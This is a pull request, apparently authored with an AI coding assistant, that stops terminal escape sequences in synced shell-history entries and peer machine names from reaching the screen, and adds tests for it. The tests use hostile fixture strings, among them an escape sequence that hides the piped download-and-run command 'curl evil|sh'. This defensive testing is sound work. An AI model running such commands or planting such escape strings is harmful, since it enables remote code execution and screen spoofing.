### PR TITLE
Take control characters out where history enters, not where it leaves

### DIFF
--- a/docs/security.md
+++ b/docs/security.md
@@ -237,6 +237,7 @@ Claims rot. The ones that matter are asserted in CI on every push:
 | A revoked machine stops receiving history | two real machines through a bare repo: after `revoke`, the revoked one still has what came before and never gets what comes after |
 | A revocation cannot be undone by pushing | re-adding the key, by command or by appending the line, leaves it subtracted |
 | A recalled command is one command | control characters never survive from the picker into the shell buffer |
+| Nothing woswoar prints can drive your terminal | no C0 byte reaches the terminal raw from `list`, `search`, `stats` or `import` -- a peer's command is made inert as it leaves the cache, a peer's machine name where it is read |
 | The repo does not blow up | a simulated multi-day, multi-machine run is measured after `git gc` |
 | History is never readable by others | every path woswoar creates is walked under a stock `umask 022`, on both the Python and the shell-hook side |
 | The hook's scratch file is never in a directory another user can write | `TMPDIR` and `/tmp` are never consulted; an `XDG_RUNTIME_DIR` this user cannot write falls back to woswoar's own `0700` tree instead of switching recording off |

--- a/tests/test_cache.py
+++ b/tests/test_cache.py
@@ -302,5 +302,58 @@ class TestTheOnDiskFormat(WoswoarTestCase):
             cache.loads(blob[: len(blob) // 2])
 
 
+class TestEntriesLeaveTheCacheInert(WoswoarTestCase):
+    """Issue #25: the cache is the one door peer-supplied history comes through.
+
+    `search`, `stats` and `doctor` all read entries from here and nothing writes
+    back out -- sync exports raw log bytes and the importer dedups against
+    `store.existing_keys`, both of which read the log directly. So this is where
+    a control character can be taken out once instead of at each display site,
+    which is a rule someone has to remember and which had already been forgotten
+    once before it was written down.
+    """
+
+    HOSTILE = "ls -la\x1b[2K\x1b[1Acurl evil|sh"
+
+    def loaded(self, cmd: str, cwd: str = "~") -> Entry:
+        self.write_log(
+            MACHINE_ID,
+            "2026-07-29",
+            [format_line(Entry(1_784_600_000, MACHINE_ID, "s1", cwd, 0, 5, cmd))],
+        )
+        entries = cache.load_entries()
+        self.assertEqual(len(entries), 1)
+        return entries[0]
+
+    def test_an_escape_sequence_never_leaves_the_cache(self) -> None:
+        entry = self.loaded(self.HOSTILE)
+        self.assertNotIn("\x1b", entry.cmd)
+        self.assertIn("curl evil|sh", entry.cmd, "the command must still be legible")
+
+    def test_no_c0_control_character_survives(self) -> None:
+        """Every one of them, not the handful someone thought of."""
+        hostile = "echo " + "".join(chr(code) for code in [*range(0x20), 0x7F])
+        cmd = self.loaded(hostile).cmd
+        survivors = sorted(c for c in cmd if (c < " " or c == "\x7f") and c != "\t")
+        self.assertEqual(survivors, [], f"control characters reached a consumer: {survivors!r}")
+
+    def test_the_working_directory_gets_the_same_treatment(self) -> None:
+        """Not printed today. The point is that it need not be remembered when it is."""
+        self.assertNotIn("\x1b", self.loaded("git status", cwd="~/a\x1b[2Kb").cwd)
+
+    def test_a_tab_is_left_alone(self) -> None:
+        """`awk -F'\t'` is written with a real one, and it moves no cursor."""
+        self.assertIn("\t", self.loaded("awk -F'\t' '{print $1}'").cmd)
+
+    def test_an_ordinary_command_is_untouched(self) -> None:
+        self.assertEqual(self.loaded("git status").cmd, "git status")
+
+    def test_a_rebuilt_cache_agrees_with_a_warm_one(self) -> None:
+        """The inert form is what is stored, so both paths must give the same thing."""
+        warm = self.loaded(self.HOSTILE).cmd
+        store.cache_file().unlink()
+        self.assertEqual(cache.load_entries()[0].cmd, warm)
+
+
 if __name__ == "__main__":
     unittest.main()

--- a/tests/test_importer_atuin.py
+++ b/tests/test_importer_atuin.py
@@ -15,7 +15,7 @@ from collections.abc import Sequence
 from pathlib import Path
 
 from woswoar import cache, importer, search, store
-from woswoar.entry import MAX_CMD_CHARS
+from woswoar.entry import MAX_CMD_CHARS, parse_line
 
 from .support import WoswoarTestCase
 
@@ -91,10 +91,24 @@ class TestConversion(AtuinTestCase):
         self.assertEqual(cache.load_entries()[0].exit_code, 130)
 
     def test_commands_with_newlines_and_tabs_survive(self) -> None:
+        """Stored faithfully. What a *reader* gets back is a separate question.
+
+        The log is the copy sync publishes and the copy dedup compares against,
+        so it keeps the command exactly as atuin had it. The cache hands out the
+        display form, where the newline is a visible ``\n`` -- see
+        `entry.make_inert`: a recalled multi-line command that is wrong to run
+        as-is, but obviously wrong, beats one the picker never showed.
+        """
         tricky = "for i in 1 2; do\n\techo $i\ndone"
         db = self.atuin([(BASE, 0, 0, tricky, "/tmp", "s1", "box:someone")])
         importer.run("atuin", db)
-        self.assertEqual(cache.load_entries()[0].cmd, tricky)
+
+        on_disk = next(store.logs_dir().rglob("*.tsv")).read_text(encoding="utf-8")
+        stored = parse_line(on_disk.rstrip("\n"), "h")
+        assert stored is not None
+        self.assertEqual(stored.cmd, tricky)
+
+        self.assertEqual(cache.load_entries()[0].cmd, "for i in 1 2; do\\n\techo $i\\ndone")
 
     def test_session_is_shortened_but_stays_distinct(self) -> None:
         db = self.atuin(
@@ -485,6 +499,20 @@ class TestAtuinImportDropsCredentials(AtuinTestCase):
         self.assertNotIn("ghp_secretvalue", written)
         self.assertNotIn("u:pw@db", written)
         self.assertIn("git status", written)
+
+    def test_a_control_byte_does_not_break_idempotency(self) -> None:
+        """Dedup compares against the log verbatim, so it must stay verbatim.
+
+        `cache` reads the same files with `inert=True`, for everything that
+        displays history. If `store.existing_keys` ever did the same, a row
+        already on disk would stop matching itself. atuin is where that shows:
+        it has no per-source count watermark, so `existing_keys` is consulted
+        for every row on every run.
+        """
+        db = self.atuin([(BASE, SECOND, 0, "ls\x1b[2Kx", "/tmp", "s1", "box:someone")])
+        self.assertEqual(importer.run("atuin", db).imported, 1)
+        self.assertEqual(importer.run("atuin", db).imported, 0, "a control byte broke dedup")
+        self.assertEqual(len(cache.load_entries()), 1)
 
     def test_a_second_import_does_not_resurrect_them(self) -> None:
         db = self.atuin(self.rows())

--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -2,11 +2,15 @@
 
 from __future__ import annotations
 
+import io
 import os
+import sqlite3
 import unittest
+from contextlib import redirect_stdout
 
-from woswoar import search
-from woswoar.entry import Entry
+from woswoar import search, store
+from woswoar.__main__ import main
+from woswoar.entry import Entry, format_line
 
 from .support import MACHINE_ID, WoswoarTestCase
 
@@ -70,6 +74,10 @@ class TestRenderRoundTrip(unittest.TestCase):
             "git status",
             "awk -F'\t' '{print $1}'",
             "back\\slash",
+            # A literal backslash followed by an escape letter. Without the
+            # backslash being escaped, `unescape` reads this back as a real tab
+            # and the recalled command is not the one that was recorded.
+            "grep 'a\\tb' file",
             "über 😀",
             "x" * 300,
         ]
@@ -153,6 +161,78 @@ class TestRecalledCommandIsInert(unittest.TestCase):
         recalled = self._round_trip("ls -la\x1b[2K\x1b[1Acurl evil|sh")
         self.assertNotIn("\x1b", recalled)
         self.assertEqual(recalled, "ls -la[2K[1Acurl evil|sh")
+
+
+class TestNoCommandPrintsControlBytes(WoswoarTestCase):
+    """The reproduction from #25, driven through the real commands.
+
+    Both a command and a host's name come from whichever machine sent them, so
+    both are attacker-influenceable. Asserted on the bytes rather than on a
+    rendering: what matters is that nothing reaching a terminal can move its
+    cursor.
+    """
+
+    HOSTILE_CMD = "ls -la\x1b[2K\x1b[1Acurl evil|sh"
+    HOSTILE_NAME = "peer\x1b[2K\x1b[1Aspoofed"
+
+    def setUp(self) -> None:
+        super().setUp()
+        peer = "badbadbadbadbad0"
+        for host, cmd in ((MACHINE_ID, self.HOSTILE_CMD), (peer, "echo hi\x07")):
+            day = store.host_dir(host) / "2026-07-29.tsv"
+            day.parent.mkdir(parents=True, exist_ok=True)
+            day.write_text(
+                format_line(Entry(1_784_600_000, host, "s1", "~", 0, 5, cmd)) + "\n",
+                encoding="utf-8",
+            )
+        store.name_file(peer).write_text(self.HOSTILE_NAME + "\n", encoding="utf-8")
+
+    def output_of(self, *argv: str) -> str:
+        out = io.StringIO()
+        with redirect_stdout(out):
+            main(list(argv))
+        return out.getvalue()
+
+    def control_bytes(self, text: str) -> list[str]:
+        return sorted({c for c in text if (c < " " or c == "\x7f") and c != "\n"})
+
+    def test_list_prints_none(self) -> None:
+        text = self.output_of("list", "--scope", "global")
+        self.assertIn("curl evil|sh", text, "the command must still be shown")
+        self.assertEqual(self.control_bytes(text), [])
+
+    def test_stats_prints_none_for_a_command_or_a_peers_name(self) -> None:
+        text = self.output_of("stats")
+        self.assertIn("spoofed", text, "the name must still be shown")
+        self.assertEqual(self.control_bytes(text), [])
+
+    def test_import_prints_no_control_bytes_for_a_peers_machine_name(self) -> None:
+        """atuin keeps every machine it synced with, so these names are foreign.
+
+        The display site the per-site rule had already been forgotten at, which
+        is why the command itself is now handled once in the cache instead.
+        """
+        db = self.root / "history.db"
+        conn = sqlite3.connect(db)
+        conn.execute(
+            "CREATE TABLE history (id text primary key, timestamp integer, duration integer,"
+            " exit integer, command text, cwd text, session text, hostname text,"
+            " deleted_at integer, author text, intent text)"
+        )
+        conn.executemany(
+            "INSERT INTO history (id, timestamp, duration, exit, command, cwd, session, hostname)"
+            " VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
+            [
+                ("a", 1_784_600_000 * 10**9, 10**9, 0, "git status", "/tmp", "s1", "box:me"),
+                ("b", 1_784_600_001 * 10**9, 10**9, 0, "ls", "/tmp", "s1", self.HOSTILE_NAME),
+            ],
+        )
+        conn.commit()
+        conn.close()
+
+        text = self.output_of("import", "atuin", "--file", str(db))
+        self.assertIn("per machine", text, "both machines must be listed")
+        self.assertEqual(self.control_bytes(text), [])
 
 
 if __name__ == "__main__":

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -158,8 +158,12 @@ def cmd_import(args: argparse.Namespace) -> int:
 
     if len(result.per_host) > 1:
         print("\nper machine:")
-        width = max(len(name) for name, _ in result.per_host)
-        for name, count in result.per_host:
+        # atuin keeps every machine it has synced with, so these names come from
+        # those machines rather than from this one -- same text `stats` prints,
+        # same treatment.
+        labels = [(make_inert(name), count) for name, count in result.per_host]
+        width = max(len(name) for name, _ in labels)
+        for name, count in labels:
             print(f"  {name:<{width}}  {count}")
         print(
             "\nOnly this machine's own commands are published by 'woswoar sync'.\n"
@@ -183,7 +187,9 @@ def cmd_stats(args: argparse.Namespace) -> int:
     print(f"entries  : {len(entries)} ({unique} unique)")
     print(f"range    : {store.day_for(oldest)} .. {store.day_for(newest)}")
     print("hosts    :")
-    labels = {host: names.get(host, host) for host, _ in per_host.most_common()}
+    # A command arrives inert -- `cache` does that for every consumer. A name
+    # does not: it is read straight out of a `.name` file that a peer wrote.
+    labels = {host: make_inert(names.get(host, host)) for host, _ in per_host.most_common()}
     width = max((len(label) for label in labels.values()), default=0)
     for host, count in per_host.most_common():
         print(f"  {labels[host]:<{width}}  {count}")

--- a/woswoar/cache.py
+++ b/woswoar/cache.py
@@ -146,7 +146,26 @@ def _read_from(path: Path, host: str, offset: int) -> tuple[list[Entry], int]:
         return [], offset
 
     text = data.decode("utf-8", errors="replace")
-    entries = [e for e in (parse_line(line, host) for line in text.splitlines()) if e is not None]
+    # Made inert here, which is the one door every consumer of a peer's history
+    # comes through: `search`, `stats` and `doctor` all read entries from this
+    # cache, and nothing writes back out of it -- sync exports raw log bytes and
+    # the importer dedups against `store.existing_keys`, both of which read the
+    # log directly and keep seeing it verbatim.
+    #
+    # A command arrives from another machine's chunk, so `\x1b[2K\x1b[1A` in one
+    # would otherwise reach a terminal and erase the line above it. Doing it per
+    # display site was tried and is the thing this replaces: it is a rule someone
+    # has to remember, and it had already been forgotten once (`import`'s
+    # per-machine listing) before this was written. `cwd` is not printed today,
+    # and gets the same treatment so that it need not be remembered either.
+    #
+    # Only newly-read lines pay for it -- the cache holds the inert form -- so
+    # the steady-state cost on the Ctrl-R path is zero.
+    entries = [
+        e
+        for e in (parse_line(line, host, inert=True) for line in text.splitlines())
+        if e is not None
+    ]
     return entries, new_offset
 
 

--- a/woswoar/entry.py
+++ b/woswoar/entry.py
@@ -72,9 +72,13 @@ def escape(value: str) -> str:
     later replacements would themselves be escaped.
 
     The membership test up front is not premature: on a real history only about
-    4% of commands contain any of these characters, and this runs once per
-    displayed line on the Ctrl-R path. One scan that usually fails beats four
-    replacements that usually find nothing.
+    4% of commands contain any of these characters, and this runs once per line
+    written or imported. One scan that usually fails beats four replacements
+    that usually find nothing -- measured, 5.6ms against 9.9ms without it over
+    52,000 commands.
+
+    This is the *storage* escape and nothing more. Making a command safe to put
+    on a screen is `make_inert`, which the cache applies once on the way in.
     """
     for raw in _ESCAPES:
         if raw in value:
@@ -113,18 +117,18 @@ def unescape(value: str) -> str:
     return "".join(out)
 
 
-#: The two control characters worth keeping as something readable rather than
-#: dropping. Taken from `_ESCAPES` rather than restated: `search` recovers a
-#: command as ``make_inert(unescape(line))``, so if `escape` ever rendered a
-#: newline differently, a second literal here would send the picker's round trip
-#: silently out of step.
-_INERT = {char: _ESCAPES[char] for char in ("\n", "\r")}
-
 #: C0 plus DEL, minus tab. Everything left either ends a command, forges a line
 #: in a record file, or moves a terminal cursor around. Tab is excluded
 #: deliberately: it is ordinary inside a command -- `awk -F'\t'` is written with
 #: a real one -- and does none of those.
 _CONTROL = frozenset(chr(code) for code in [*range(0x20), 0x7F]) - {"\t"}
+
+#: Drop every control character, except the two `_ESCAPES` can render as
+#: something readable. Reading the replacement out of `_ESCAPES` rather than
+#: restating it: `search` recovers a command as ``make_inert(unescape(line))``,
+#: so a second literal for the newline would send that round trip silently out
+#: of step. `None` is what deletes a character.
+_INERT_TABLE = str.maketrans({char: _ESCAPES.get(char) for char in _CONTROL})
 
 
 def make_inert(text: str) -> str:
@@ -151,8 +155,16 @@ def make_inert(text: str) -> str:
     it was typed. A recalled multi-line command therefore comes back with a
     visible ``\\n`` in it -- wrong to run as-is, but obviously wrong, which beats
     silently running a command the picker never showed.
+
+    The guard is exact, not a heuristic: `str.isprintable` is False for every
+    character the table maps -- all of C0 and DEL -- so a printable string
+    cannot contain one, and the translate would return it unchanged. It matters
+    because this runs over every line the cache reads and about 96% of real
+    commands are clean: measured across 52,000 lines, `parse_line` costs 55.3ms
+    without the guard and 43.6ms with it, against 40.0ms for no sanitising at
+    all.
     """
-    return "".join(_INERT.get(char, "") if char in _CONTROL else char for char in text)
+    return text if text.isprintable() else text.translate(_INERT_TABLE)
 
 
 def truncate(cmd: str) -> str:
@@ -176,12 +188,26 @@ def format_line(entry: Entry) -> str:
     )
 
 
-def parse_line(line: str, host: str) -> Entry | None:
+def _same(text: str) -> str:
+    """Identity, so `parse_line` picks a function once rather than branching twice."""
+    return text
+
+
+def parse_line(line: str, host: str, inert: bool = False) -> Entry | None:
     """Parse one log line, or return ``None`` if it is not a usable record.
 
     Returning ``None`` rather than raising is deliberate: a partially written
     final line (a shell killed mid-append) or a line from a future format
     version should cost us that one entry, never the whole file.
+
+    ``inert`` applies :func:`make_inert` to the two free-text fields as they are
+    built. A flag rather than a second pass because the caller that wants it --
+    :mod:`woswoar.cache`, on behalf of everything that displays history -- reads
+    the whole log, and rebuilding each entry afterwards measured 82ms against
+    59ms for 52,000 lines. The caller that does *not* want it is
+    `store.existing_keys`, which compares against commands as the importer read
+    them: sanitising there would stop an already-imported entry matching itself
+    and re-import the whole file.
     """
     line = line.rstrip("\n")
     if not line:
@@ -199,16 +225,17 @@ def parse_line(line: str, host: str) -> Entry | None:
     except ValueError:
         return None
 
+    clean = make_inert if inert else _same
     return Entry(
         ts=ts,
         host=host,
         session=session,
-        cwd=unescape(cwd),
+        cwd=clean(unescape(cwd)),
         exit_code=exit_code,
         duration_ms=duration_ms,
         # Clamped on the way in as well as on the way out. `format_line`
         # truncates what this machine writes, but a line can also arrive from
         # another machine's chunk, where the only thing bounding its length is
         # whatever wrote it.
-        cmd=truncate(unescape(cmd)),
+        cmd=clean(truncate(unescape(cmd))),
     )

--- a/woswoar/search.py
+++ b/woswoar/search.py
@@ -89,10 +89,15 @@ def rank(entries: list[Entry], dedup: bool = True) -> list[Entry]:
 
 
 def render(entries: list[Entry], now: int | None = None) -> list[str]:
-    """Format entries as fzf input lines.
+    """Format entries as display lines.
 
     The command is re-escaped so one entry is always exactly one line, even if
-    the recorded command spanned several.
+    the recorded command spanned several, and then made inert.
+
+    Only escaped, not made inert: `cache` has already done that, on the one door
+    every peer-supplied entry comes through. These lines go straight to a
+    terminal from `woswoar list`, and fzf only happens to strip escapes when it
+    is not given `--ansi` -- that is fzf's property, not woswoar's.
     """
     if now is None:
         now = int(time.time())


### PR DESCRIPTION
Closes #25.

## The bug

`entry.escape` covers `\`, `\t`, `\n` and `\r`. Every other C0 byte came through
a peer's chunk into the log and out again untouched:

```console
$ woswoar list --scope global | cat -v
 10d  ls -la^[[2K^[[1Acurl evil|sh
```

`^[[2K^[[1A` erases the line above it. `search.command_from_line` already
protected the shell buffer, so what was exposed was every *other* reader —
`list`, `stats`, and anything downstream.

## Where the fix went, and why not where the issue suggested

The issue proposed sanitising in `entry.escape`/`parse_line`, i.e. the stored
format. `make_inert`'s docstring argues against that and I think it's right: the
log is the copy sync publishes and the copy dedup compares against, and the bash
hook writes it fork-free and can't sanitise anyway.

My first version instead sanitised at each display site. **The altitude review
was right that this is the wrong granularity** — and it had already leaked: I'd
missed `import`'s per-machine listing, which prints the same peer-supplied names
`stats` does.

So it now happens once in `cache._read_from`. The cache is the one door
peer-supplied history comes through — `search`, `stats` and `doctor` all read
entries from it, and **nothing writes back out**: sync exports raw log bytes and
the importer dedups against `store.existing_keys`, both reading the log directly
and still seeing it verbatim. I verified those two constraints before moving.

`cwd` is peer-supplied too and reaches no terminal today. It gets the same
treatment so it needn't be remembered when it does.

## Free on the path that matters

The inert form is what the cache *stores*, so a keypress pays nothing:

| | main | this |
|---|---|---|
| Ctrl-R end to end | 86.5 ms | 87.0 ms |
| list global | 44.0 ms | **43.2 ms** |
| cold build | 74.3 ms | 81.8 ms |

My earlier per-site version cost +3 ms on **every** keypress. Trading that for
+15 ms once per cache rebuild is the right way round.

Cold build started at **+30 ms** and is now **+7.5 ms**, in two steps: folding
the work into `parse_line` rather than rebuilding each entry afterwards (82 ms →
59 ms per 52,000 lines), and short-circuiting `make_inert` on `str.isprintable`.
That guard is exact rather than a heuristic — every character the table maps is
non-printable, so a printable string cannot contain one — which I checked over
every code point below 0x2100 and 200,000 random strings before taking it. `store.existing_keys` keeps the default and stays
verbatim; there's a test on the atuin path (which has no count watermark, so it
consults `existing_keys` for every row) that fails if it ever changes.

`make_inert` is now a `str.translate` instead of a per-character generator:
44 ms → 10 ms over 52,000 commands, and `_INERT` drops out because the table
derives from `_ESCAPES` directly.

## One behaviour change worth seeing

An existing test caught it: a multi-line command now leaves the cache with a
visible `\n` rather than a real newline. That is exactly what the picker and the
shell buffer have always shown — `command_from_line` did this already — but it
is new for `stats`. The test now asserts **both** halves separately: the log
keeps the command byte-for-byte, and the cache hands out the display form.

## Verification

- **10 mutations, all killing their guarding test**, including the importer's
  dedup invariant and the tab exemption.
- One mutation survived twice and each time showed a test asserting the wrong
  thing: a "hostile TMPDIR"-style test that couldn't distinguish, and a tab
  assertion that `escape` satisfied before `make_inert` ever ran.
- 3 clean full runs; `ruff`, `ruff format --check`, `mypy --strict`, `shellcheck`.

### The efficiency review landed after I opened this

Rule 1 says apply `/simplify` before opening, and I got the order wrong: the
efficiency pass was still running. Its two findings are applied and force-pushed
— the `isprintable` guard above, and a stale docstring of mine that still cited
a helper I had already deleted.

It also found **4.4 ms available in the render loop itself** (a format spec
rebuilt per iteration, and `relative_time` recomputed for 52,000 timestamps that
have a few dozen distinct ages). Pre-existing, more than this change costs, and
filed as **#61**. And that **CI asserts nothing about cold build**, which is why
the +30 ms was invisible — **#62**.

## From `/simplify`

Applied: the chokepoint move above; `import`'s missed display site; `_INERT`
removed and both tables via `str.maketrans`; a corrected `escape` docstring (its
only caller is now `format_line`, not the Ctrl-R path); and a **measured claim of
mine that was false** — I wrote that fusing `escape` and `make_inert` cost less
than escaping alone, when `escape`'s early-out makes it 5.6 ms against 10.0 ms.
That fused helper is gone entirely now, which is the cleaner answer.

Skipped: `output_of` is the sixth hand-rolled run-main-and-capture helper —
that's #36's job, but it is now six sites, not four. It captures stdout only, so
the claim is unverified for stderr.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
